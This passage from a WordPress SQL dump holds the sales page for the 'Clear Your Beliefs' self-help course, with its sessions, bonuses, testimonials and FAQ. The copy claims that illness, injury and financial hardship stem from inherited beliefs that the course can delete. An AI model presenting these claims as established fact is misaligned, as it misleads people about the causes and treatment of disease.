is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-04-14 12:12:08', '2015-04-14 17:12:08', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1958, 2, '2014-12-10 23:13:58', '2014-12-11 04:13:58', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 23:13:58', '2014-12-11 04:13:58', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1951, 2, '2014-12-10 21:00:42', '2014-12-11 02:00:42', '', 'Screenshot_4', '', 'inherit', 'closed', 'open', '', 'screenshot_4', '', '', '2014-12-10 21:00:42', '2014-12-11 02:00:42', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png', 0, 'attachment', 'image/png', 0),
(1952, 2, '2014-12-10 21:04:43', '2014-12-11 02:04:43', '', 'Screenshot_3', '', 'inherit', 'closed', 'open', '', 'screenshot_3', '', '', '2014-12-10 21:04:43', '2014-12-11 02:04:43', '', 0, 'http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_3.png', 0, 'attachment', 'image/png', 0),
(1953, 2, '2014-12-10 21:05:05', '2014-12-11 02:05:05', '', 'Screenshot_2', '', 'inherit', 'closed', 'open', '', 'screenshot_2', '', '', '2017-04-01 15:09:41', '2017-04-01 20:09:41', '', 2486, 'http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_2.png', 0, 'attachment', 'image/png', 0),
(1950, 2, '2014-12-10 20:54:27', '2014-12-11 01:54:27', '<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4-150x150.png" />&nbsp;', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 20:54:27', '2014-12-11 01:54:27', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1949, 2, '2014-12-10 20:42:38', '2014-12-11 01:42:38', '[wr_row width="boxed" background="none" solid_color_value="#FFFFFF" solid_color_color="#ffffff" gradient_color="0% #FFFFFF,100% #000000"  gradient_direction="vertical"  repeat="full"  img_repeat="full"  autoplay="yes" position="center center" paralax="no" border_width_value_="0" border_style="solid" border_color="#000"  div_padding_top="10" div_padding_bottom="10" div_padding_right="10" div_padding_left="10"   ][wr_column span="span3"][/wr_column][wr_column span="span9"][/wr_column][/wr_row]', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 20:42:38', '2014-12-11 01:42:38', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1954, 2, '2014-12-10 21:07:06', '2014-12-11 02:07:06', '<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" />			Delete Block &amp; Limitations...\nAllow More Success &amp; Joy...\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_3.png" /><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_2.png" />			Simply CLEAR Your Beliefs!', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 21:07:06', '2014-12-11 02:07:06', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1957, 2, '2014-12-10 21:34:27', '2014-12-11 02:34:27', '<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 21:34:27', '2014-12-11 02:34:27', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1956, 2, '2014-12-10 21:24:03', '2014-12-11 02:24:03', '<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_4.png" />			<h1 class="top-text">Delete Block &amp; Limitations...</h1>\n<h1 class="top-text">Allow More Success &amp; Joy...</h1>\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_3.png" /><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/12/Screenshot_2.png" />			<h1 class="top-text">Simply CLEAR Your Beliefs!</h1>', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 21:24:03', '2014-12-11 02:24:03', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
(1959, 2, '2014-12-10 23:17:39', '2014-12-11 04:17:39', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />', 'New Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-10 23:17:39', '2014-12-11 04:17:39', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0),
